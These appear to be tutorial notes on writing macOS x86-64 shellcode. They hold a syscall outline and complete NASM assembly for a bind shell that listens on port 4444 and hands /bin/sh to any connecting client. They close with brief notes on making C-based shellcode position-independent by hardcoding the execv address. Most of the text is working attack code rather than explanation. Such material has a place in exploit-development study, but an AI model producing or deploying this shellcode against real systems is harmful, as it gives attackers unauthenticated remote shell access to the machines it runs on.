Bind Shell
C code for a bind shell:
socket(2,1,0)
reserve space for sockaddr_in:
sin_len=0 (1 byte)
sin_family=2 (1 byte)
sin_port=4444/0x115c (2 bytes)
sin_addr.s_addr=0 (4 bytes)
sin_zero[8]=0 (8 bytes)
bind(socket, &addr, 0x10)
listen(socket,0)
accept(socket,0,0)
dup2(accept, i)
execve("/bin/sh", 0, 0)
Final:
bits 64
global _main
_main:
xor rsi, rsi
mov rdx, rsi
inc rsi
mov rdi,rsi
inc rdi
push 0x61
pop rax
bts rax, 25
syscall
mov r10,rax
mov rdi,r10
push 0x10
pop rdx
xor rsi,rsi
push rsi
mov esi,0x5c110200
push rsi
push rsp
pop rsi
push 0x68
pop rax
bts rax,25
syscall
mov rdi,r10
xor rsi,rsi
push 0x6a
pop rax
bts rax,25
syscall
mov rdi,r10
xor rsi,rsi
xor rdx,rdx
push 0x1e
pop rax
bts rax,25
syscall
mov r10,rax
mov rdi,r10
push 0x2
pop rsi
loop:
push 0x5a
pop rax
bts rax,25
syscall
dec rsi
jns loop
xor rdx,rdx
mov rdi,'/bin//sh'
push rdx
push rdi
mov rdi,rsp
xor rsi,rsi
push 0x3b
pop rax
bts rax,25
syscall
Examine the shellcode:
Write shellcode in C
Code hardcodes function addresses.
gcc compiler is more usable in shellcodes than clang compiler.
PIC means avoiding referencing variables or data outside the code segment
lea rdi, [rip+0x2c] and call 0x7 <dyld_stub_binder+0x100003f86> are problemic, they are outside the code segment
Use char b[] = {'/','b','i','n','/','b','a','s','h',0}; to replace "/bin/bash".
One issue is resolved. We still need to eliminate the call into the _stub section.
Make a definition for execv and specify its address manually.
Create our type definition, create a variable of the type, and cast a random memory address into the variable, the address is a placeholder for execv function.
No call into _stub section any more.
Print the address of execv, then hardcode it in the code.
Fixed